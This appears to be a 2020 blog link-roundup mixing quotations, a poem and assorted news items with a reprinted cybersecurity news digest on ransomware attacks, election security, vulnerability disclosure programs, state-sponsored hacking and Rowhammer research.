Tuesday, January 21, 2020

NEWS YOU CAN USE: The Complete Guide to Avoiding Online Scams


I don't know how introverts survived without the Internet. Or with the Internet. Actually, I don't know how we survive at all. It feels impossible.”
Amy Schumer, The Girl with the Lower Back Tattoo 


Just when the caterpillar thinks that it is all grown up, it becomes a butterfly 

”The butterfly said to the sun, “They can’t stop talking about my transformation. I can only do it once in my lifetime. If only they knew, they can do it at any time and in countless ways.”
 – Dodinsky



From The Washington Post, an illustrated encyclopedia of sleeping positions on a plane. Economy only…we don’t need to see how peacefully the lie-flat fancies in business are slumbering. 






The multi-millionaire son of Exclusive Brethren world leader Bruce D. Hales has been accused of assaulting a man on a public street outside the religious leader's mansion in suburban Sydney.

 


 A woy of world without pain (New Yorker)


Putin Enlists Major Cultural Leaders To Rewrite Russian Constitution



Malchkeon rereading the late Clive James, came across this in his introduction to Cultural Amnesia (2007): “There is too much to appreciate.” Mozart, he notes, never heard all of Bach. “We can hear everything by both of them.” He writes:


“It would be a desirable and enviable existence just to earn a decent wage at a worthwhile job and spend all one’s leisure hours improving one’s aesthetic appreciation. There is so much to appreciate, and it is all available for peanuts. One can plausibly aspire to seeing, hearing and reading everything that matters.” 



Butterfly Kisses

Aged imperfections
stitched upon my face
years and years of wisdom
earned by His holy grace.
Quiet solitude in a humble home
all the family scattered now
like nomads do they roam.
Then a gift 
sent from above
a memory
pure and tangible
wrapped in innocence and
unquestioning love.
A butterfly kiss
lands gently upon my cheek
from an unseen child
a kiss most sweet.
Heaven grants grace
and tears follow
as youth revisits
this empty hollow.”
― Muse, Enigmatic Evolution









Own your data. Hub Culture is the one global community actively committed to ensuring individual data ownership as it works to build frameworks for digital self-reliance, governance, and collaboration. You can get involved here.


Joseph Savirimuthu, “Book review: Blockchain and the Law: The Rule of Code”, (2019) 16:1 SCRIPTed 95 https://script-ed.org/?p=3748 DOI: 10.2966/scrip.160119.95. Download PDF


Grandson 'inherited' ancestor's WWI head injuries


Why is Japan so successful at returning lost property?


In the dark, it's easy to see through Singapore’s respectable facadeIn Singapore, everything has its price. Even people.



Hank Azaria from The Simpsons says he will no longer voice Apu


A voice actor for hit animated series The Simpsons has said he will no longer voice the controversial character of Apu Nahasapeemapetilon, an Indian-born convenience store owner.


Where did the urban legend of the dangerous Australian drop bear come from?


Tricking visitors into believing Australia is home to predatory bears that drop from treetops on to unsuspecting people walking below has become a national pastime, but where did the myth originate?



The Atlantic: “The judging for the eighth annual Ocean Art Underwater Photo Contest, organized by the Underwater Photography Guide, has wrapped up, and the winning images and photographers have been announced. Greg Lecoeur took Best in Show with his image of a crabeater seal in Antarctica. The contest organizers have shared with us some of the winners and honorable mentions below, from the 16 categories of underwater photography. Captions were written by the individual photographers and have been lightly edited for content.”

Gov Info Security
January 3, 2020
Certain federal agencies, especially units within the Department of Defense, still have plenty of work to do when it comes to sharing cybersecurity information and threat intelligence among themselves as well with the private sector, according to an unclassified report recently sent to Congress. The Office of the Inspector General of the Intelligence Community, which is part of the Office of the Director of National Intelligence, published the audit. While the audit found that substantial progress has been made on the sharing cybersecurity information and threat intelligence among agencies over the last two years, it pointed to several areas of ongoing concern, including the failure of certain Defense Department units to use appropriate policies and procedures for data sharing.

Reuters
January 2, 2020
Newly passed legislation will push the U.S. State Department to disclose how it polices the sale of cyber tools and services abroad. The move followed a Reuters investigation which revealed that American intelligence contractors clandestinely assisted a foreign spying operation in the United Arab Emirates, helping the monarchy to crack down on internal dissent. The legislation directs the State Department to report to Congress within 90 days on how it controls the spread of cyber tools and to disclose any action it has taken to punish companies for violating its policies. Under U.S. law, companies selling hacking products or services to foreign governments must first obtain permission from the State Department. U.S. lawmakers and human rights advocates have grown increasingly concerned that hacking skills developed for U.S. spy services are being sold abroad with scant oversight. “Just as we regulate the export of missiles and guns to foreign countries, we need to properly supervise the sale of cyber capabilities,” said congressman Dutch Ruppersberger of Maryland, who drafted the legislation.

The Hill
January 1, 2020
A federal strategy for defending the U.S. government against cyberattacks is one step closer to completion, with lawmakers saying they have a draft form that could be finalized as early as March. The report has been in the works since 2018 after the National Defense Authorization Act created a commission, consisting of lawmakers and industry leaders, to draw up recommendations. Rep. Mike Gallagher (R-Wis.), co-chairman of the commission, told The Hill that the commission had recently put together a draft version. “Over the holiday we will have a few weeks to dig into the draft text, and there are a few issues we are working through, but we feel good,” Gallagher said on Dec. 19. “We had a meeting this week, an additional meeting, and it was a really robust debate, and so I think we’re getting there.” The 2020 National Defense Authorization Act, signed into law by President Trump last month, extended the initial deadline for the commission to produce the report to April 30. Rep. Jim Langevin (D-R.I.), another member of the commission, told The Hill that the commission would likely publish the report before the new deadline. “We will get our work done certainly before then. It could well be as early as March,” Langevin said on Dec. 19. “We are coming to a place where we can see the light at the end of the tunnel.”

Nextgov
December 31, 2019
With just over 10 months to go before Americans head to the polls to elect their next president, states will have access to additional money to help shore up insecure voting equipment. The funding—$425 million—was included in appropriations for the Election Assistance Commission under the 2020 spending bills President Trump signed into law on Dec. 20. EAC Chairwoman Christy McCormick said the commission “will do everything in its power to distribute these funds as expeditiously as possible.” The funding is a boost over Congress’ most recent appropriation of $380 million for election improvements in 2018—the first time since 2010 that Congress made resources available to help states and localities with their election infrastructure and administration. “State and local election officials from across the country regularly tell us about the need for additional resources,” said EAC Vice Chair Benjamin Hovland. “This new funding will allow election officials to continue making investments that strengthen election security and improve election administration in 2020 and beyond.” While election experts welcomed the new funding, they said it may not be  sufficient in the face of ongoing threats. Lawrence Norden, director of the Electoral Reform Program at the Brennan Center for Justice, said the funding is “an important and necessary step” to protecting the 2020 elections. However, it “should not be Congress’s only investment in election security.”


ADMINISTRATION

Politico
January 2, 2020
A long-awaited report this week from the Department of Homeland Security found security problems with the computer systems that a North Carolina county used to handle voter data during the 2016 election — but no evidence that Russian hackers had breached them. Still, the review is unlikely to totally resolve questions surrounding the county’s use of software provided by the Florida company VR Systems, which — as POLITICO reported last week — have added to broader doubts about the security of election technology that Americans will use at the polls in 2020. Experts contacted by POLITICO said the new DHS analysis has its share of holes — for instance, failing to examine all the computer systems the Russians could have targeted. And they noted that officials in Durham County, N.C., had waited until about a week after Election Day to preserve some potentially important evidence. “I think [the investigation is] incomplete,” says Jake Williams a former NSA hacker who is founder of the security firm Rendition Infosec and trains forensic analysts. “It’s the best investigation that can be conducted under the circumstances. We can’t investigate what we don’t have, [and] a lot of the crucial evidence is missing.”

FCW
January 2, 2020
The Department of Homeland Security and the General Services Administration want to know what it would take to develop a cloud-based centralized vulnerability disclosure platform for the federal government. In a request for information released late December, the agencies asked industry for feedback on how to set up a system that could serve as a primary point of entry for security researchers warning about bugs in their internet-accessible systems. While the platform would be managed by the Cybersecurity and Infrastructure Security Agency at DHS, agencies might have to kick in some of their own funding and participation would be voluntary. CISA is looking at a centralized software-as-a-service platform that can track incoming submissions, validate each report for legitimate bugs while filtering out errant ones, enable web-based communication between the reporter and agency during remediation efforts and allow agencies to create separate role-based accounts for their main organization and component agencies.

The Times-Picayune
January 2, 2020
Three weeks after City Hall computer systems were crippled by a cyberattack, New Orleans officials on Thursday offered their first timeline for restoring the systems, saying the city's Police Department and courts should have their access to computer networks restored by Monday. Most of the city's computers have been screened and cleared for use by employees, officials said during a press conference to provide an update on progress. The city's online systems for paying bills and transacting other city business should be available before property tax deadlines at the end of January. "We have made significant progress," Chief Information Officer Kim Walker LaGrue said, adding that her office as well as 75 state and federal partners have been working continuously since the attack to restore the city's networks.

Infosecurity Magazine
January 2, 2020
US maritime facilities have been on high alert over the Christmas break after the Coast Guard revealed details of a ransomware-related outage in late December. The bulletin described a recent attack causing widespread operational disruption at a “Maritime Transportation Security Act (MTSA) regulated facility. “Forensic analysis is currently ongoing but the virus, identified as ‘Ryuk’ ransomware, may have entered the network of the MTSA facility via an email phishing campaign. Once the embedded malicious link in the email was clicked by an employee, the ransomware allowed for a threat actor to access significant enterprise Information Technology (IT) network files, and encrypt them, preventing the facility’s access to critical files,” it explained. “The virus further burrowed into the industrial control systems that monitor and control cargo transfer and encrypted files critical to process operations. The impacts to the facility included a disruption of the entire corporate IT network (beyond the footprint of the facility), disruption of camera and physical access control systems, and loss of critical process control monitoring systems.” The port facility’s operations were apparently disrupted for over 30 hours as a result of the attack.

CyberScoop
January 2, 2020
The FBI is warning U.S. companies about a series of recent ransomware attacks in which the perpetrator, sometimes posing as a government agency, steals data and then encrypts it to further extort victims. In an advisory to the private sector last week, the FBI called for vigilance to combat the so-called Maze ransomware, which the bureau said began hitting U.S. organizations in November. “From its initial observation, Maze used multiple methods for intrusion, including the creation of malicious look-a-like cryptocurrency sites and malspam campaigns impersonating government agencies and well-known security vendors,” states the advisory obtained by CyberScoop.

Fifth Domain
December 28, 2019
The public comment period on the draft vulnerability disclosure program for federal agencies published by the Department of Homeland Security’s cybersecurity agency has been extended until Jan. 10, 2020. The draft binding operational directive (BOD), one of few authorities Cybersecurity and Infrastructure Security Agency has to force entities to take action, would require that federal agencies establish a VDP, in which security researchers could report vulnerabilities in agencies’ public-facing websites. The original comment period was set to expire Dec. 27, but CISA extended the deadline after a “phenomenal response" from stakeholders. So far, CISA has received comments from stakeholders both at federal agencies, industry and think tanks, concerned with everything from legal protections for researchers submitting vulnerabilities to mandated remediation time frames. Several comments have expressed concern about resources agencies ultimately dedicate to the disclosure programs.


INDUSTRY

ZDNet
January 3, 2020
An Arkansas-based telemarketing firm sent home more than 300 employees and told them to find new jobs after IT recovery efforts didn't go according to plan following a ransomware incident that took place at the start of October 2019. Employees of Sherwood-based telemarketing firm The Heritage Company were notified of the decision just days before Christmas, via a letter sent by the company's CEO. Speaking with local media, employees said they had no idea the company had even suffered a ransomware attack, and the layoffs were unexpected, catching many off guard. "Unfortunately, approximately two months ago our Heritage servers were attacked by malicious software that basically 'held us hostage for ransom' and we were forced to pay the crooks to get the 'key' just to get our systems back up and running," wrote Sandra Franecke, the company's CEO, in the letter sent to employees. She goes on to say that data recovery efforts, initially estimated at one week, have not gone according to plan and the company had failed to recover full service by Christmas. Franecke said the company lost "hundreds of thousands of dollars" because of the incident and have been forced to "restructure different areas in the company."

Bleeping Computer
January 2, 2020
The anonymous operators behind the Maze Ransomware are being sued by a victim for illegally accessing their network, stealing data, encrypting computers, and publishing the stolen data after a ransom was not paid. The company suing Maze is Southwire, a leading wire and cable manufacturer from Carrollton, Georgia, who was attacked in December 2019. As part of this attack, the ransomware allegedly stole 120GB of data and encrypted 878 devices. After a ransom of 850 bitcoins, or $6 million. was not paid by Southwire, the Maze operators published a portion of their stolen data on a "news" site that the threat actors created. This site is hosted at an ISP in Ireland that Southwire states that they contacted repeatedly but did not receive a response.

CyberScoop
December 31, 2019
Microsoft has taken hold of 50 websites used by suspected North Korean hackers to bolster attempted hacks against government employees, universities and nuclear organizations, among other targets. The company announced Monday it won a court order allowing it to take over 50 websites that a hacking group Microsoft refers to as Thallium (also known as APT37, or Reaper) has used as part of a campaign to steal sensitive data. Thallium would send phishing emails which directed would-be victims to malicious websites, where they would be prompted to enter their username and password. A successful effort would provide Thallium access to victimized account data including messages, contact lists and appointments. This effort marks the fourth time Microsoft has used U.S. courts to sink nation-state hacking infrastructure. In March, Microsoft said it took over domains used by Phosphorous, an Iranian group also known as Charming Kitten, and in August 2018 said it had moved against Strontium, a Russian group more commonly known as Fancy Bear or APT28. The company also has disrupted a Chinese-linked group it calls Barium.

AP
December 31, 2019
An Alaska air carrier that suffered a cyber attack has experienced more disruption than initially projected, according to a company announcement. The RavnAir Group on Dec. 20 experienced what it called a "malicious" cyber attack on its information technology network, Anchorage television station KTVA reported. The company canceled some Alaska flights of Dash 8 aircraft and said passengers could expect more schedule changes. On Monday, the company announced the disruption was worse than initially reported. Restoration of systems could take up to a month, the company said. Additional flight cancellations and delays are possible for the group's three airlines, RavnAir Alaska, PenAir and RavnAir Connect, the company said.


INTERNATIONAL

The Washington Post
January 3, 2020
Iran’s cyber troops long have been among the world’s most capable and aggressive — disrupting banking, hacking oil companies, even trying to take control of a dam from afar — while typically stopping short of the most crippling possible actions, say experts on the country’s capabilities. But Friday’s American airstrike that killed one of Iran’s top generals, Quds Force Commander Maj. Gen. Qasem Soleimani, now threatens to unleash a fully unshackled Iranian response, analysts and former U.S. officials warned. They said a variety of potential cyber-attacks, possibly in conjunction with more traditional forms of lethal action, would be well within the digital arsenal of a nation that has vowed “severe revenge." “At this point, a cyber-attack should be expected,” said Jon Bateman, a former Defense Intelligence Agency analyst on Iran’s cyber capabilities and now a cybersecurity fellow for the Carnegie Endowment for International Peace.

The Wall Street Journal
December 30, 2019
he hackers seemed to be everywhere. In one of the largest-ever corporate espionage efforts, cyberattackers alleged to be working for China's intelligence services stole volumes of intellectual property, security clearance details and other records from scores of companies over the past several years. They got access to systems with prospecting secrets for mining company Rio Tinto PLC, and sensitive medical research for electronics and health-care giant Philips NV. They came in through cloud service providers, where companies thought their data was safely stored. Once they got in, they could freely and anonymously hop from client to client, and defied investigators' attempts to kick them out for years. Cybersecurity investigators first identified aspects of the hack, called Cloud Hopper by the security researchers who first uncovered it, in 2016, and U.S. prosecutors charged two Chinese nationals for the global operation last December. The two men remain at large. A Wall Street Journal investigation has found that the attack was much bigger than previously known. It goes far beyond the 14 unnamed companies listed in the indictment, stretching across at least a dozen cloud providers, including CGI Group Inc., one of Canada's largest cloud companies; Tieto Oyj, a major Finnish IT services company; and International Business Machines Corp.

Gov Info Security
December 30, 2019
Wanted: A new chief executive to take the helm of Britain's National Cyber Security Center. On Friday, the NCSC announced that its chief executive, Ciaran Martin, 45, will pursue longstanding plans to step down from his position by the end of summer 2020. A search is underway for his replacement to facilitate a smooth handover before his scheduled leaving date. Martin's upcoming departure serves as useful moment for reviewing the effectiveness of the NCSC model, which looks to have been highly successful at creating a one-stop-shop for private-sector organizations to interface with the government about cybersecurity matters, including investigating major incidents, defending against nation-state attacks and battling election interference. The model is now being emulated in other countries, although the U.S. remains a notable holdout.


TECHNOLOGY

ZDNet
January 2, 2020
In a new research paper published on the last day of 2019, a team of American and German academics has shown that field-programmable gate array (FPGA) cards can be abused to launch better and faster Rowhammer attacks. The new research expands on previous work into an attack vector known as Rowhammer. Rowhammer attacks were first detailed in 2014. The attack exploits a design flaw in the hardware modern memory cards -- most commonly known as RAM. On modern RAM cards, data is stored inside memory cells, and all memory cells are arranged in a grid pattern. In 2014, academics discovered that by reading data stored on one row of memory cells repeatedly, and at high speeds, they could create an electrical charge that would alter data stored in nearby memory rows. By coordinating repeated read operations, in an operation named "row hammering," they could use the unwanted electrical charges to corrupt RAM data, or manipulate the user's data in malicious ways. After it was disclosed to the public, industry experts deemed the Rowhammer attack only a theoretical threat, but one that had the potential to become a bigger problem later down the line. Just as it was initially predicted, over the past five years, academics have greatly expanded on the initial Rowhammer attack. They found ways around mitigations, they expanded the attack surface to various computer components and configurations, and they even found a way to use Rowhammer to steal data from attacked systems, instead of just altering it. The latest addition to this list is a new Rowhammer attack variation called JackHammer, which allows a malicious party to abuse FPGA cards to launch better and faster Rowhammer attacks.